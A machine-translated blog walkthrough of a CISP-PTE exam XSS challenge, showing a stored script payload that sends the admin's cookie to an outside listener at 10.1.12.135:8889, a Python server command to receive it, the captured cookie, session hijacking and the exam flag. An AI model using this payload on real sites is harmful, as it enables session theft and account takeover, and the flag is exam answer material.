cisp-pte xss問題

2023年7月20日#渗透测试 #考证359

AI 翻訳

この記事はAIを通じて中国語から日本語に翻訳されました。原文を表示

AI が生成した要約

XSS内容的主要目标是获取管理员的cookie，并伪造管理员的cookie进行登录。通过点击界面上的Test按钮可以进行留言。准备获取cookie的XSS负载，开启web服务并接收cookie。将负载写入输入框，点击提交查询并等待。查看Python是否接收到cookie，并将cookie复制下来。将cookie值替换掉，并点击Edit进行替换。刷新界面，点击Admin成功登录并获取到key为wps10。

Xss の主な焦点は、管理者のクッキーを取得し、その後、偽の管理者のクッキーを使用してログインすることです。

以下は、インターフェースです。

上の図の「Test」をクリックしてメッセージを残すことができます。

クッキーを取得するための XSS ペイロードを準備します。

<script>
document.write('<img src="http://10.1.12.135:8889?'+ escape(document.cookie) + '">')
</script>

Web サーバーを起動し、クッキーを受け取ります。

Python -m SimpleHTTPServer 8889

ペイロードを入力ボックスに書き込みます。

「Submit Query」をクリックします。

待つ

Python がクッキーを受け取ったかどうかを確認します。

クッキーをコピーします。

1acb0fb952b3caaf1ab7277511923138

クッキーの値を置き換えます。

「Edit」をクリックして置き換えます。

ページを更新し、管理者をクリックします。

ログインに成功し、キーを取得しました。

wps10